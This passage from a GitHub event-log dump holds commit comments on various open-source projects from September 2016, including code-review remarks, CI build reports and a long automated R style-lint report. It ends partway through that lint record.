{"id":"4577616226","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19064022,"position":null,"line":null,"path":null,"commit_id":"ee235a9ccb78a92de33c9bba7799b7b698e1c693","created_at":"2016-09-17T08:46:30Z","updated_at":"2016-09-17T08:46:30Z","body":"Why I hate merging from the web interface."}},"created_at":"2016-09-17T08:46:30Z"}
{"id":"4577616584","type":"CommitCommentEvent","actor":{"login":"escalade"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":19064023,"position":null,"line":null,"path":null,"commit_id":"46f91ef3c1873f347dd8ccc6afd21202e8980dc1","created_at":"2016-09-17T08:46:49Z","updated_at":"2016-09-17T08:46:49Z","body":"There's quite a few extra kernel configuration symbols that needs to be set because of this."}},"created_at":"2016-09-17T08:46:49Z"}
{"id":"4577617096","type":"CommitCommentEvent","actor":{"login":"clime"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":19064024,"position":2,"line":2,"path":"beaker-tests/Regression/backend/distgit-files/var/lib/dist-git/git/rpms/@copr/copr-dev/example.git/objects/53/677fae27782b4e970ce11e9fbf2523f7081b8d","commit_id":"a69c1789fcb1a3cf8f64650a3f6e84fcdd07fb5b","created_at":"2016-09-17T08:47:20Z","updated_at":"2016-09-17T08:47:20Z","body":"> So you claim this hasn't got generated before you've pushed that?\r\n\r\nPushed into the dist-git repo which forms test data for backend suite, yes.\r\n\r\n>Usually people generate the stuff dynamically during tests, or during release time into tarballs -- but never put such >things into git please.\r\n\r\nI don't see any issue in putting test data into git repo. Making it a tarball is something that might be done."}},"created_at":"2016-09-17T08:47:20Z"}
{"id":"4577618290","type":"CommitCommentEvent","actor":{"login":"ilovezfs"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19064026,"position":null,"line":null,"path":null,"commit_id":"ee235a9ccb78a92de33c9bba7799b7b698e1c693","created_at":"2016-09-17T08:48:22Z","updated_at":"2016-09-17T08:48:22Z","body":"I guess it could be addressed by making an incorrect commit subject an audit failure for devel and for bottle unneeded/disabled"}},"created_at":"2016-09-17T08:48:22Z"}
{"id":"4577619214","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19064027,"position":null,"line":null,"path":null,"commit_id":"ee235a9ccb78a92de33c9bba7799b7b698e1c693","created_at":"2016-09-17T08:49:14Z","updated_at":"2016-09-17T08:49:14Z","body":"Or make a habit of always pulling first. I'll try that."}},"created_at":"2016-09-17T08:49:14Z"}
{"id":"4577619327","type":"CommitCommentEvent","actor":{"login":"DzmitrySV"},"repo":{"name":"MaximDanilov/GIIS"},"payload":{"comment":{"id":19064028,"position":null,"line":null,"path":null,"commit_id":"52c8d3acdea61524bc1682b05181269685e64343","created_at":"2016-09-17T08:49:22Z","updated_at":"2016-09-17T08:49:22Z","body":"Plotter нужно отдавать алгоритму, чтобы тот сразу рисовал пиксели на канвасе.\r\nДля тестов нужно  будет сделать заглушку(хз как это делается)."}},"created_at":"2016-09-17T08:49:22Z"}
{"id":"4577619460","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19064029,"position":null,"line":null,"path":null,"commit_id":"895f07e18b0bb678e64516dc66b0e2461c4c33ca","created_at":"2016-09-17T08:49:30Z","updated_at":"2016-09-17T08:49:30Z","body":"Initial commit."}},"created_at":"2016-09-17T08:49:30Z"}
{"id":"4577620065","type":"CommitCommentEvent","actor":{"login":"Maartenwut"},"repo":{"name":"Maartenwut/plakbak.nl"},"payload":{"comment":{"id":19064030,"position":null,"line":null,"path":null,"commit_id":"71934651f97db0b823555fa2bc9f8073411e363e","created_at":"2016-09-17T08:50:04Z","updated_at":"2016-09-17T08:50:04Z","body":"de textarea was te hoog"}},"created_at":"2016-09-17T08:50:04Z"}
{"id":"4577622711","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19064032,"position":null,"line":null,"path":null,"commit_id":"59583e97deef732f6884a54b518fc34225fd6012","created_at":"2016-09-17T08:52:17Z","updated_at":"2016-09-17T08:52:17Z","body":"Yep. There was an endless cycle between this and qgsdoublespinbox. All fixed:)"}},"created_at":"2016-09-17T08:52:17Z"}
{"id":"4577622844","type":"CommitCommentEvent","actor":{"login":"wang0804"},"repo":{"name":"wang0804/test-project"},"payload":{"comment":{"id":19064033,"position":null,"line":null,"path":null,"commit_id":"5679edbb6cbc0292b4d5e72ec5e62aa7f615dfed","created_at":"2016-09-17T08:52:24Z","updated_at":"2016-09-17T08:52:24Z","body":"another commit"}},"created_at":"2016-09-17T08:52:24Z"}
{"id":"4577623311","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19064034,"position":null,"line":null,"path":null,"commit_id":"f92ff090099e2a23abe28140f67b8c424c53569e","created_at":"2016-09-17T08:52:49Z","updated_at":"2016-09-17T08:52:49Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1213 of 1214 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.92%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.02%25-green.svg)</a>\n"}},"created_at":"2016-09-17T08:52:49Z"}
{"id":"4577624248","type":"CommitCommentEvent","actor":{"login":"duck8823"},"repo":{"name":"duck8823/Slack-RTM-Bot"},"payload":{"comment":{"id":19064035,"position":29,"line":151,"path":"lib/Slack/RTM/Bot.pm","commit_id":"34fdeb922ec47f4203dd16deb98409d98037fd65","created_at":"2016-09-17T08:53:34Z","updated_at":"2016-09-17T08:53:34Z","body":"#3 added loop block."}},"created_at":"2016-09-17T08:53:34Z"}
{"id":"4577624371","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19064036,"position":null,"line":null,"path":null,"commit_id":"f92ff090099e2a23abe28140f67b8c424c53569e","created_at":"2016-09-17T08:53:39Z","updated_at":"2016-09-17T08:53:39Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-17T08:53:39Z"}
{"id":"4577626378","type":"CommitCommentEvent","actor":{"login":"yjchoi0606"},"repo":{"name":"IlhwanHwang/CSED353Project"},"payload":{"comment":{"id":19064039,"position":null,"line":null,"path":null,"commit_id":"52c00f933f1d778b093f263fb7d2209b0aeb41ea","created_at":"2016-09-17T08:55:22Z","updated_at":"2016-09-17T08:55:22Z","body":"미적  측면을 위해\r\n1. 아름다운 음악 추가\r\n\r\n버그 수정 사항으로는\r\n1. 꽃잎과 유닛의 교차에 충돌 판정을 넣었습니다."}},"created_at":"2016-09-17T08:55:22Z"}
{"id":"4577626887","type":"CommitCommentEvent","actor":{"login":"thejameskyle"},"repo":{"name":"douglascrockford/JSLint"},"payload":{"comment":{"id":19064041,"position":null,"line":null,"path":null,"commit_id":"185661488c2d805eddd99685fa39f8291e6a1187","created_at":"2016-09-17T08:55:50Z","updated_at":"2016-09-17T08:55:50Z","body":"I dunnnnno... Feels like youre kinda forcing that one"}},"created_at":"2016-09-17T08:55:50Z"}
{"id":"4577627168","type":"CommitCommentEvent","actor":{"login":"mattiamanzati"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19064042,"position":null,"line":null,"path":null,"commit_id":"ab57fa8554e4d2efaeaf2dd0ab82ea6434bac5b5","created_at":"2016-09-17T08:56:04Z","updated_at":"2016-09-17T08:56:04Z","body":"Uhm, to enforce that we could remove isActive param to the children function. That would leave only onClick, href and transition. This would let the User pass only link-related props and eventually encourage only link being created as child."}},"created_at":"2016-09-17T08:56:04Z"}
{"id":"4577628057","type":"CommitCommentEvent","actor":{"login":"McLoy"},"repo":{"name":"McLoy/EasyTasks"},"payload":{"comment":{"id":19064045,"position":null,"line":null,"path":null,"commit_id":"4e07d454ef63df20fc55c28f6268ff9816a0e6a4","created_at":"2016-09-17T08:56:52Z","updated_at":"2016-09-17T08:56:52Z","body":"Thanks, i push this many times because my IDE give me fatal error...in result i reinstall my Ubuntu.\r\nAnd now it works normal.\r\nUnit tests and TDD i'll use later. For now I study bases things.\r\nHave a nice day!"}},"created_at":"2016-09-17T08:56:52Z"}
{"id":"4577628838","type":"CommitCommentEvent","actor":{"login":"DzmitrySV"},"repo":{"name":"MaximDanilov/GIIS"},"payload":{"comment":{"id":19064047,"position":null,"line":null,"path":null,"commit_id":"53c1bf92d41e7af9e4a5f172ec5f0f26e5e53999","created_at":"2016-09-17T08:57:38Z","updated_at":"2016-09-17T08:57:38Z","body":"Для первой лабы может и сойдет, ну а потом нужно будет менять гуай.\r\nНа что-то типо:\r\n&ensp;&ensp;В корне  сцена с тулбаром и подсценой\r\n&ensp;&ensp;На подсцене только канвас\r\n&ensp;&ensp;При смене инструментов меняется обработчик событий канваса\r\n"}},"created_at":"2016-09-17T08:57:38Z"}
{"id":"4577629201","type":"CommitCommentEvent","actor":{"login":"gizmo98"},"repo":{"name":"RetroPie/SDL-mirror"},"payload":{"comment":{"id":19064048,"position":null,"line":null,"path":null,"commit_id":"57fc057a74168974d7db52e6c8ae4bee9b764930","created_at":"2016-09-17T08:57:59Z","updated_at":"2016-09-17T08:57:59Z","body":"Ubuntu 16.04 SDL2.0.4 package has the same problem. I failed to rewrite our SDL2 module to build a  x86/x64 SDL2.0.4 package. "}},"created_at":"2016-09-17T08:57:59Z"}
{"id":"4577632859","type":"CommitCommentEvent","actor":{"login":"syu93"},"repo":{"name":"pinnackl/ambitionetreussite"},"payload":{"comment":{"id":19064050,"position":14,"line":115,"path":"src/ad-pages/ad-pages.html","commit_id":"9aec2ef7e6bb9d3741aa7180bfcd81bf1d603884","created_at":"2016-09-17T09:00:48Z","updated_at":"2016-09-17T09:00:48Z","body":"Change to \"Nom de la page\""}},"created_at":"2016-09-17T09:00:48Z"}
{"id":"4577632976","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19064051,"position":null,"line":null,"path":null,"commit_id":"a69dd7d661c0372470c607dfecd69d278e21d802","created_at":"2016-09-17T09:00:51Z","updated_at":"2016-09-17T09:00:51Z","body":"almost fixed...\r\n![capture](https://cloud.githubusercontent.com/assets/3521959/18607172/335a2954-7cbd-11e6-8b3c-be3dfa119a63.PNG)\r\n\r\nthe current selection marker should be same color as base color to match all other boxes of same style like e.g. **https://github.com/contact** and a few others.\r\n\r\n![capture](https://cloud.githubusercontent.com/assets/3521959/18607182/7f7d432a-7cbd-11e6-9ece-21e11071094e.PNG)\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-17T09:00:51Z"}
{"id":"4577633002","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"godotengine/asset-library"},"payload":{"comment":{"id":19064052,"position":5,"line":48,"path":"src/routes/asset_edit.php","commit_id":"524892a5fdb107d198498c7cdee76a157c4e063c","created_at":"2016-09-17T09:00:52Z","updated_at":"2016-09-17T09:00:52Z","body":"Doing this, since line 60 errors out when it is not a string :smile: "}},"created_at":"2016-09-17T09:00:52Z"}
{"id":"4577636714","type":"CommitCommentEvent","actor":{"login":"gdh1995"},"repo":{"name":"smblott-github/vimium"},"payload":{"comment":{"id":19064054,"position":16,"line":60,"path":"lib/keyboard_utils.coffee","commit_id":"b82e0c8f87bc0e6650e38e4ca7901e21d9ef327f","created_at":"2016-09-17T09:02:57Z","updated_at":"2016-09-17T09:02:57Z","body":"Um, this commit should work."}},"created_at":"2016-09-17T09:02:57Z"}
{"id":"4577638246","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19064056,"position":null,"line":null,"path":null,"commit_id":"304de22be1ba9cd5f287c254f443d9a74be3523f","created_at":"2016-09-17T09:04:16Z","updated_at":"2016-09-17T09:04:16Z","body":"添加了基础的数据"}},"created_at":"2016-09-17T09:04:16Z"}
{"id":"4577640202","type":"CommitCommentEvent","actor":{"login":"duck8823"},"repo":{"name":"duck8823/Slack-RTM-Bot"},"payload":{"comment":{"id":19064060,"position":14,"line":131,"path":"lib/Slack/RTM/Bot.pm","commit_id":"34fdeb922ec47f4203dd16deb98409d98037fd65","created_at":"2016-09-17T09:06:01Z","updated_at":"2016-09-17T09:06:01Z","body":"fixed #4 "}},"created_at":"2016-09-17T09:06:01Z"}
{"id":"4577640541","type":"CommitCommentEvent","actor":{"login":"mkclcr"},"repo":{"name":"mahendra2015/git-code-review"},"payload":{"comment":{"id":19064061,"position":7,"line":21,"path":"app/index.html","commit_id":"b6f4241fdedef8b6c7d3e804af85f44a4dda2504","created_at":"2016-09-17T09:06:17Z","updated_at":"2016-09-17T09:06:17Z","body":"Dependency is duplicate. Kindly remove"}},"created_at":"2016-09-17T09:06:17Z"}
{"id":"4577641479","type":"CommitCommentEvent","actor":{"login":"adriancole"},"repo":{"name":"google/census-java"},"payload":{"comment":{"id":19064063,"position":null,"line":null,"path":null,"commit_id":"26073e34b588752eb21a83b604704caf256cc846","created_at":"2016-09-17T09:07:06Z","updated_at":"2016-09-17T09:07:06Z","body":"suppose we could document it as a constraint. regardless, curious that we are looking up the charset each time.."}},"created_at":"2016-09-17T09:07:06Z"}
{"id":"4577644128","type":"CommitCommentEvent","actor":{"login":"Dirtier"},"repo":{"name":"Dirtier/Codewars-JS"},"payload":{"comment":{"id":19064065,"position":null,"line":null,"path":null,"commit_id":"309dfcf41bf976d6d39f42f68adf97d594c29e63","created_at":"2016-09-17T09:09:27Z","updated_at":"2016-09-17T09:09:27Z","body":"..."}},"created_at":"2016-09-17T09:09:27Z"}
{"id":"4577645996","type":"CommitCommentEvent","actor":{"login":"klappradla"},"repo":{"name":"kindr3d/discourse"},"payload":{"comment":{"id":19064070,"position":14,"line":241,"path":"config/routes.rb","commit_id":"56f89c331cb03af3cbacc3fc3a2ff3c2ced03251","created_at":"2016-09-17T09:11:09Z","updated_at":"2016-09-17T09:11:09Z","body":"Indentation is wrong here *(one space missing)*. If you haven't set you editor to use *\"soft tabs\"* with length of 2 spaces. It's [best practise for Ruby](https://github.com/bbatsov/ruby-style-guide#source-code-layout) and helps to keep files consistently readable for everyone."}},"created_at":"2016-09-17T09:11:09Z"}
{"id":"4577647353","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19064072,"position":null,"line":null,"path":null,"commit_id":"a69dd7d661c0372470c607dfecd69d278e21d802","created_at":"2016-09-17T09:12:20Z","updated_at":"2016-09-17T09:12:20Z","body":"in addition when hovering over the section expansion arrows they become transparent.\r\n\r\n![gif](https://cloud.githubusercontent.com/assets/3521959/18607230/04a8ae58-7cbf-11e6-813b-ac4262fb6d86.gif)\r\n\r\n@Mottie almost likes dags but instead likes caravans better."}},"created_at":"2016-09-17T09:12:20Z"}
{"id":"4577650076","type":"CommitCommentEvent","actor":{"login":"klappradla"},"repo":{"name":"kindr3d/discourse"},"payload":{"comment":{"id":19064080,"position":5,"line":4,"path":"app/controllers/admin/stats_controller.rb","commit_id":"97a3660fd1faf46ed2a4fbbf9170155956a1b942","created_at":"2016-09-17T09:14:44Z","updated_at":"2016-09-17T09:14:44Z","body":"Again wrong indentation here - the method body and the `end` tag need to be shifted left one level (two spaces)."}},"created_at":"2016-09-17T09:14:44Z"}
{"id":"4577650443","type":"CommitCommentEvent","actor":{"login":"rebroad"},"repo":{"name":"litecoin-project/litecoin"},"payload":{"comment":{"id":19064082,"position":7,"line":667,"path":"src/main.cpp","commit_id":"b1be77210970a6ceb3680412cc3d2f0dd4ca8fb9","created_at":"2016-09-17T09:15:05Z","updated_at":"2016-09-17T09:15:05Z","body":"seems a strange fix to make this one exception...."}},"created_at":"2016-09-17T09:15:05Z"}
{"id":"4577651695","type":"CommitCommentEvent","actor":{"login":"klappradla"},"repo":{"name":"kindr3d/discourse"},"payload":{"comment":{"id":19064085,"position":5,"line":241,"path":"config/routes.rb","commit_id":"97a3660fd1faf46ed2a4fbbf9170155956a1b942","created_at":"2016-09-17T09:16:06Z","updated_at":"2016-09-17T09:16:06Z","body":"Indentation is wrong here *(one space missing)*. If you haven't set you editor to use *\"soft tabs\"* with length of 2 spaces. It's [best practise for Ruby](https://github.com/bbatsov/ruby-style-guide#source-code-layout) and helps to keep files consistently readable for everyone."}},"created_at":"2016-09-17T09:16:06Z"}
{"id":"4577652113","type":"CommitCommentEvent","actor":{"login":"LadyCailin"},"repo":{"name":"EngineHub/CommandHelper"},"payload":{"comment":{"id":19064086,"position":24,"line":474,"path":"src/main/java/com/laytonsmith/core/functions/Threading.java","commit_id":"5155e7a367f3741821bbd2bb212d691bf2fed039","created_at":"2016-09-17T09:16:30Z","updated_at":"2016-09-17T09:16:30Z","body":"What's up with the word wrap here?"}},"created_at":"2016-09-17T09:16:30Z"}
{"id":"4577653339","type":"CommitCommentEvent","actor":{"login":"sarfarazahmad89"},"repo":{"name":"archfan/infinality_bundle"},"payload":{"comment":{"id":19064089,"position":null,"line":null,"path":null,"commit_id":"acb83b884f46b4c54a5529376592739f929e0fbe","created_at":"2016-09-17T09:17:40Z","updated_at":"2016-09-17T09:17:40Z","body":"A gazillion thanks for this work ! This repository works better for me than bohoomil's. Amazing font rendering with this repo ! "}},"created_at":"2016-09-17T09:17:40Z"}
{"id":"4577654214","type":"CommitCommentEvent","actor":{"login":"klappradla"},"repo":{"name":"kindr3d/discourse"},"payload":{"comment":{"id":19064092,"position":4,"line":4,"path":"app/assets/javascripts/admin/components/stats-users.js.es6","commit_id":"8c038e84a4163a77c64ede3ec1ce2dd6402a7598","created_at":"2016-09-17T09:18:30Z","updated_at":"2016-09-17T09:18:30Z","body":"Not 100% familiar with es6 syntax, but I think there should go one space after the comparison operators `<`, `===`, `!==`"}},"created_at":"2016-09-17T09:18:30Z"}
{"id":"4577654599","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19064094,"position":null,"line":null,"path":null,"commit_id":"48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b","created_at":"2016-09-17T09:18:48Z","updated_at":"2016-09-17T09:18:48Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:3:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L3) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/ABC_SMC.R:8:8:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L8) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  while(sum(x2) != max_val)\n       ^\n```\n[R/ABC_SMC.R:9:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​  \t\ta <- sample(1:3,size=1,prob=x-floor(x));\n  ^~\n```\n[R/ABC_SMC.R:9:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L9) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  {\n  ^\n```\n[R/ABC_SMC.R:10:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​  \t\tx2[a] <- x2[a]+1;\n  ^~\n```\n[R/ABC_SMC.R:10:19:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​  \t\ta <- sample(1:3,size=1,prob=x-floor(x));\n                 ~^~~\n```\n[R/ABC_SMC.R:10:37:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​  \t\ta <- sample(1:3,size=1,prob=x-floor(x));\n                                   ~^~\n```\n[R/ABC_SMC.R:10:44:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​  \t\ta <- sample(1:3,size=1,prob=x-floor(x));\n                                          ~^~\n```\n[R/ABC_SMC.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L19) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L20) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/ABC_SMC.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L28) *style:* **lines should not be more than 80 characters.**\n```r\n​calculateWeight <- function(params, target, sigM, dispVals, filtVals, compVals, numParticles, W)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L28) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigM, dispVals, filtVals, compVals, numParticles, W)\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:28:45:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L28) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigM, dispVals, filtVals, compVals, numParticles, W)\n                                            ^~~~\n```\n[R/ABC_SMC.R:28:51:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L28) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigM, dispVals, filtVals, compVals, numParticles, W)\n                                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:28:61:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L28) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigM, dispVals, filtVals, compVals, numParticles, W)\n                                                            ^~~~~~~~\n```\n[R/ABC_SMC.R:28:71:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L28) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigM, dispVals, filtVals, compVals, numParticles, W)\n                                                                      ^~~~~~~~\n```\n[R/ABC_SMC.R:28:81:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L28) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigM, dispVals, filtVals, compVals, numParticles, W)\n                                                                                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:29:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L29) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/ABC_SMC.R:30:7:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L30) *style:* **Use <-, not =, for assignment.**\n```r\n​  sum = 0.0;\n      ^\n```\n[R/ABC_SMC.R:32:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L32) *style:* **Variable and function names should be all lowercase.**\n```r\n​  numP <- length(dispVals);\n  ^~~~\n```\n[R/ABC_SMC.R:32:18:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L32) *style:* **Variable and function names should be all lowercase.**\n```r\n​  numP <- length(dispVals);\n                 ^~~~~~~~\n```\n[R/ABC_SMC.R:34:6:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:numP)\n     ^\n```\n[R/ABC_SMC.R:34:14:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L34) *style:* **Variable and function names should be all lowercase.**\n```r\n​  for(i in 1:numP)\n             ^~~~\n```\n[R/ABC_SMC.R:35:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L35) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  {\n  ^\n```\n[R/ABC_SMC.R:36:5:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L36) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(dispVals[i], filtVals[i], compVals[i]);\n    ^~~~~\n```\n[R/ABC_SMC.R:36:16:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L36) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(dispVals[i], filtVals[i], compVals[i]);\n               ^~~~~~~~\n```\n[R/ABC_SMC.R:36:29:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L36) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(dispVals[i], filtVals[i], compVals[i]);\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:36:42:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L36) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(dispVals[i], filtVals[i], compVals[i]);\n                                         ^~~~~~~~\n```\n[R/ABC_SMC.R:37:30:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​    diff <- params[target] - prevP[target];\n                             ^~~~~\n```\n[R/ABC_SMC.R:38:50:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L38) *style:* **Variable and function names should be all lowercase.**\n```r\n​    vals[i] <- W[i] * dnorm(diff, mean = 0, sd = sigM);\n                                                 ^~~~\n```\n[R/ABC_SMC.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(d[numParticles,1] == 